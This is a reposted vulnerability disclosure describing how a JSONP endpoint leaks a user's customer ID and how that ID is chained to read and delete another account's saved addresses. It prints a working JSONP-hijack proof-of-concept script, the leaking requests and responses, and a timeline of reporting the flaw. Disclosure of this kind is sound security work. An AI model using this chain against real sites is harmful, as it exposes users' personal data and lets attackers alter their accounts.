Jsonp+Excessive deletion Vul

admin 2021年7月29日01:10:25评论105 views字数 2299阅读7分39秒阅读模式

1、First I found the address of the website that leaked the user id.

jQuery111308705583230454748_1548063320659({"responseCode":"200","responseDesc":"success","responseData":{"cust":{"customerGuid":"df73d476-5f1d-e911-80ff-******","language":"zh-cn","fullName":"YongShao","gender":2,"country":"CN","countryName":"China","province":"CN-12","provinceName":"****","city":"CN-12-001","cityName":"****","telephone":"1***********","email":""}}})


Then I constructed the jsonp's poc to get the victim's id.


<script>function jQuery111308705583230454748_1548063320659(d) {alert(d['responseData']['cust']['customerGuid']);}</script><script type="text/javascript"src="https://yongshao.com/ccpcmd/services/dispatch/secured/CCPC/EN/ccpd/getServiceCust/1000jsonp=jQuery111308705583230454748_1548063320659&accountId=&source=100000007&channelCode=WEBSITE&countryCode=CN&langCode=zh-cn&country=CN&language=zh-cn&siteCode=zh_CN&_=1548063320660"></script>


got it

Jsonp+Excessive deletion Vul



2、Then I found that I can use the id splicing to get the user address id.


https://yongshao.com/ccpcmd/services/dispatch/secured/CCPC/EN/ccpd/getContactList/1000?jsonp=jQuery111308705583230454748_1548063320661&source=100000007&customerGuid=df73d476-5f1d-e911-80ff-*******&language=zh-cn&channelCode=WEBSITE&countryCode=CN&langCode=zh-cn&country=CN&siteCode=zh_CN&_=1548063320667


response:

jQuery111308705583230454748_1548063320661({"responseData":{"list":[{"customerGuid":"df73d476-5f1d-e911-80ff-******","contactAddressId":"e973d476-5f1d-e911-80ff-******","language":"zh-cn","fullName":"tset","country":"CN","province":"CN-12","city":"CN-12-001","district":"CN-12-001-02","isDefault":"N","createdon":"2019-01-21 03:45:04","countryName":"China","provinceName":"*****","cityName":"*****","districtName":"***","telephone":"131********","postCode":"","address":"*****"}]},"responseCode":"200","responseDesc":"success"})


contactAddressId This parameter is the address



3、Try to use this information to delete on the B account


F12 find delete button

<a data-contactaddressid="e973d476-5f1d-e911-80ff-******" class="delete-btn under-line" href="javascript:;">Del</a>


Then return to the A account to confirm whether the deletion was successful. Observe through the jsonp interface

Jsonp+Excessive deletion Vul



  • TimeLine

2019.01.21 Report Vul

2019.01.22 Received a vulnerability and transferred processing

……(I don't know when it was fixed.)

2019.02.19 Published paper

本文始发于微信公众号(逢人斗智斗勇):Jsonp+Excessive deletion Vul

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月29日01:10:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Jsonp+Excessive deletion Vulhttps://cn-sec.com/archives/343564.html

发表评论

匿名网友 填写信息